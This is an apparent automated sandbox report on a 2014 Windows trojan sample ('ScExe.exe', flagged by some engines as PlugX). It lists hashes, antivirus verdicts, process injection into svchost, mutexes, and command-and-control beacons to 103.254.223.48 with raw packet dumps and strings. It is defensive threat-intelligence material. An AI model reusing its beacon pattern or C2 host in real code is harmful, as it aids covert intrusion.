Analysis Date: 2014-12-15 16:52:34
MD5: 7e25069350d7844d723a0644ab1f7c75
SHA1: 285563e3979e980edaa454d8d378f784c42f0b8c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: ef9927f7ae5ad4cd8b65d9fee42d5a1b sha1: 79632c1e33c9536f84da8a93a571a12a8e238dfd size: 25088
Section .rdata: md5: 6874bb521841f4d556f1b88c10ed016c sha1: 42db7961d190052d163f8df8418db772cc0db5fa size: 122880
Section .data: md5: df20a802e0857f3ecebbd12d191e1aed sha1: db5886a4ec8dd132c7853b952d757fd904269b1e size: 3584
Section .rsrc: md5: ad5e2143aa4fcf8bdf1069daef347adc sha1: 074467381c7f37140def371c34187346c3735f8a size: 1024
Section .reloc: md5: 90d72f199b0c8d48429ecf6a4f51c340 sha1: c914d7192350ea1ee37aaf004d0082ea41a38f4f size: 3584
Timestamp: 2014-09-22 15:31:03
Version:
  LegalCopyright: Copyright (C) 2014
  InternalName: ScExe
  FileVersion: 1, 0, 0, 1
  ProductName: ScExe Application
  ProductVersion: 1, 0, 0, 1
  FileDescription: ScExe Application
  OriginalFilename: ScExe.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 7c32deac710b696be2d0ddf70eeefcc3ea52e138
IMPhash: fc9c524063422845a4c42efc7820fea6
AV 360 Safe: Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Ad-Aware: Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Alwil (avast): no_virus
AV Arcabit (arcavir): Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Authentium: no_virus
AV Avira (antivir): TR/Crypt.ZPACK.Gen4
AV BullGuard: Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanAPT.PlugX.E4
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Eset (nod32): no_virus
AV Fortinet: no_virus
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Grisoft (avg): no_virus
AV Ikarus: Trojan.Inject
AV K7: no_virus
AV Kaspersky: Trojan-Dropper.Win32.Injector.kzrt
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic Dropper!vq
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen.SMH
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\All Users\DRM\mcsync\kzqucedolaoac
Creates Mutex: Global\cwbhkksbxvwqp
Creates Mutex: Global\stodr
Creates Mutex: Global\oslgnyyol
Creates Mutex: Global\mxtia
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\oobscoiawverl
Creates Mutex: Global\kjjquuyddnjvy
Creates Mutex: Global\gcboa
Creates Mutex: Global\ordefamblbyvoxdzw
Creates Mutex: Global\ytyfipdwm
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: Global\sxzfpnxmf
Creates Mutex: Global\aklrjsqho
Creates Mutex: Global\iwmvdlkwfalpkjxvz
Creates Mutex: Global\eqmrikmfucabncwuu
Creates Mutex: My_Name
Creates Mutex: Global\welxlcdyczgarwjiy
Creates Mutex: Global\ooblq
Creates Mutex: Global\mbdlmpnpzvyvxjgfu
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\undqqwznr
Creates Mutex: Global\mybmyflgojpyy
Winsock DNS: 103.254.223.48

Network Details:

HTTP GET: http://103.254.223.48:443/96C813865599BAF0109BDE9A
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GET: http://103.254.223.48:443/146101DD15F5C5BFF9C02A1D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GET: http://103.254.223.48:443/5ECD95013F011A4134B3F806
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GET: http://103.254.223.48:443/738ACA101AD9B4312046E1F4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GET: http://103.254.223.48:443/519CA9EC8772797475AEA6CE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 103.254.223.48:443
Flows TCP: 192.168.1.1:1031 ➝ 103.254.223.48:443
Flows TCP: 192.168.1.1:1032 ➝ 103.254.223.48:443
Flows TCP: 192.168.1.1:1033 ➝ 103.254.223.48:443
Flows TCP: 192.168.1.1:1034 ➝ 103.254.223.48:443
Flows TCP: 192.168.1.1:1035 ➝ 103.254.223.48:443

Raw Pcap
0x00000000 (00000)   47455420 2f393643 38313338 36353539   GET /96C81386559
0x00000010 (00016)   39424146 30313039 42444539 41204854   9BAF0109BDE9A HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20647a76   */*..Cookie: dzv
0x00000040 (00064)   6536646f 62762f49 41712f51 2f507063   e6dobv/IAq/Q/Ppc
0x00000050 (00080)   427a7351 4533726f 3d0d0a55 7365722d   BzsQE3ro=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f313436 31303144 44313546   GET /146101DD15F
0x00000010 (00016)   35433542 46463943 30324131 44204854   5C5BFF9C02A1D HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20514d46   */*..Cookie: QMF
0x00000040 (00064)   39744457 635a3741 74667a6f 77304444   9tDWcZ7Atfzow0DD
0x00000050 (00080)   42563156 45793345 3d0d0a55 7365722d   BV1VEy3E=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f354543 44393530 31334630   GET /5ECD95013F0
0x00000010 (00016)   31314134 31333442 33463830 36204854   11A4134B3F806 HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20326331   */*..Cookie: 2c1
0x00000040 (00064)   396e6f33 306f3831 346f424e 30332b51   9no30o814oBN03+Q
0x00000050 (00080)   395a7864 42394b77 3d0d0a55 7365722d   9ZxdB9Kw=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f373338 41434131 30314144   GET /738ACA101AD
0x00000010 (00016)   39423433 31323034 36453146 34204854   9B4312046E1F4 HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 2057754e   */*..Cookie: WuN
0x00000040 (00064)   32536676 5a466f6b 535a6c4c 4c327665   2SfvZFokSZlLL2ve
0x00000050 (00080)   6966334b 705a7245 3d0d0a55 7365722d   if3KpZrE=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f353139 43413945 43383737   GET /519CA9EC877
0x00000010 (00016)   32373937 34373541 45413643 45204854   2797475AEA6CE HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20714146   */*..Cookie: qAF
0x00000040 (00064)   575a7251 67664632 744a5945 4e615172   WZrQgfF2tJYENaQr
0x00000050 (00080)   484d4956 79706367 3d0d0a55 7365722d   HMIVypcg=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....


Strings
fed
.CC
 
]
....
.
.
.
.
.
...
...
.M.
.
.
.
.
..

040904b0
1, 0, 0, 1
Copyright (C) 2014
FileDescription
FileVersion
                                 H
         (((((                  H
         h((((                  H
InternalName
KERNEL32.DLL
LegalCopyright
mscoree.dll
OriginalFilename
ProductName
ProductVersion
ScExe
ScExe Application
ScExe.exe
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
>!?:?{?
                          
0$0,040<0D0L0T0\0d0l0t0|0
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
080=0^0c0
0A@@Ju
0SSSSS
0WWWWW
0X1g1v1
1 151<1P1W1o1{1
1/161<1N1V1a1
1&1n1v1
1)272=2M2R2j2p2
	12fh#
14TKlv
1%cz-8]
_2[_*[_&
2"2)262Y2n2
2EdsR>
"2Zto:
3080?0D0K0P0
3 3*333>3J3O3_3d3j3p3
3&3>3d3
3'4B4H4Q4X4z4
3H4X4h4x4
#4^5bU
'4d!2!hu
4;.Vj?
505L5U5[5d5i5x5
538A8G8a8f8u8~8
5%50595O5Z5t5
5%5)5/545:5?5N5d5o5t5
5$6)64696W6
596?6K6
5C5a5h5l5p5t5x5|5
5F6Q6l6s6x6|6
6[_:[_
64696G6Q6n6
6[g>[gR[
6R6X6i6
6T6X6`6d6
707P7l7p7
7 7j7p7t7x7|7
7+8E8h8u8
7Q7Z7f7
808P8p8
8C4;^Q
8#;@;l;
8N8T8`8
8O8h8o8w8|8
='=9=0>:>R>Y>c>k>x>
9+929<9f9t9z9
9!9+929F9M9S9a9h9m9v9
9^9d9h9l9p9
9Y9~I[
a6P7ise
AAFFf;
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
a%Y])T
bbdTsb
bdW"cO
b eqb.
B(	HXN
bIW"bv
bjTd&/db
bkR(VH
Bowoux
{bpynw
BR{dqpo
{brznr
'c0['n
";"{Cb
"_[Cj3
)cN|tV
CorExitProcess
- CRT not initialized
C	Xs-ZXs-ZXs-ZQ
D[_:[_>
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DOMAIN error
dwvwxR
ej%"S>
EncodePointer
EnterCriticalSection
equmqrf
equmwf
eru>ru
ExitProcess
ezgfvq
fbmObf
fd{bpy
fduor{
February
>F?K?P?U?e?
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsW
Friday
fwjB|*
[g6[gB[g
g6[g.[g:
[gB[g:[g
gb[gZ[gV
GetACP
GetActiveWindow
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
gF[gR[gZ
[g*"[g2
g&[g2[g:
g*[g&[g.
g.[g&[g2
"[g*[gN[
g:hzvS
gJ[gF[gNV['
[gR[gF
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
HvcqxZ
h"ZH"ZM
ierd{pfx
ierrqfx
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
:I;T;^;o;z;
JanFebMarAprMayJunJulAugSepOctNovDec
January
j(dA	f
j hxWB
j@j ^V
jXh@VB
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
;m;2<\<
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
m/Oe|x
Monday
MultiByteToWideChar
MU#~MM
#M"]"x#]
nefdur
nnqubTcU
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
Ob2=zO@?
October
Of-|E@
)/oOxXMd
o:qhwK
OWj%bcb
pbfwdx
ph{dqpo
Please contact the application's support team for more information.
p:mUu~
PPPPPPPP
Program: 
<program name unknown>
puqvwde
- pure virtual function call
"PwydRhv
qgduwe
QQSVWh
QRFL-"
QueryPerformanceCounter
qybywv
`.rdata
@.reloc
"RG~WLy
RtlUnwind
runtime error 
Runtime Error!
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
&sF[W(
sgwpuk
SING error
SleepEx
Sunday
SunMonTueWedThuFriSat
T${_^3
teha#@
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
T${j@h
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9]
Tuesday
;t$,v-
t+WWVPV
uBhZ @
ud{rf<q
- unable to initialize heap
- unable to open console device
uN"C<^
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UQPXY]Y[
URPQQh8Q@
USER32.DLL
uweewe
VCbuUw
VirtualAlloc
VirtualFree
v	N+D$
vvdwee
;vXVVV
VZ[s-ZXs,Z
wbee{qp
w<d6%W
wdxqdo
Wednesday
wemfqr
W"gZM@b
Wh"TO@#
WideCharToMultiByte
wk=Cy2}
wnwf$w
wourkd
WriteFile
wroqdk
=.=W=\=s=
wsgwef
<xf9^W
xJvgxU
x[W*[rU*
---x-xM
<=<Y<|<
>=Yt1j
ywfzqbeftkp
yzRbvl
ZAs-ZQ
zgfvqi
ZHs-ZQ
zoryJ"
ZYs-ZQ
ZYs-ZRichXs-Z
ZZs-ZF!